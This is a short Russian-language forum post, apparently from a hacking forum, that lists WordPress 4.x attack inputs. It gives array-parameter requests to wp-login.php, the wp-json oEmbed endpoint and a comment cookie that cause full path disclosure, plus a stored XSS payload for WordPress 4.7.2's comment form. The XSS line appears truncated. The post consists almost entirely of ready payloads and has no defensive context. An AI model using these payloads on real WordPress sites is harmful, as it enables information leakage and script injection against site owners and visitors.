08.02.2017, 12:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
52834
Репутация:
47
|
|
Wordpress 4.*.*
Full Path Disclosure
wordpress/wp-login.php
Код:
Code:
POST: log[]=1&pwd[]=1&redirect_to[]=
wp-json
Код:
Code:
GET: wordpress/wp-json/oembed/1.0/embed?format=xml&url[]=123
Код:
Code:
Cookie: comment_author_email_dbdee7661db32144cd2347d98b860504[]
Wordpress 4.7.2
Stored XSS
Привилегии: Редактор+
/wp/wp-comments-post.php
Код:
Code:
POST: comment=">alert('XSS');
|
|
|
|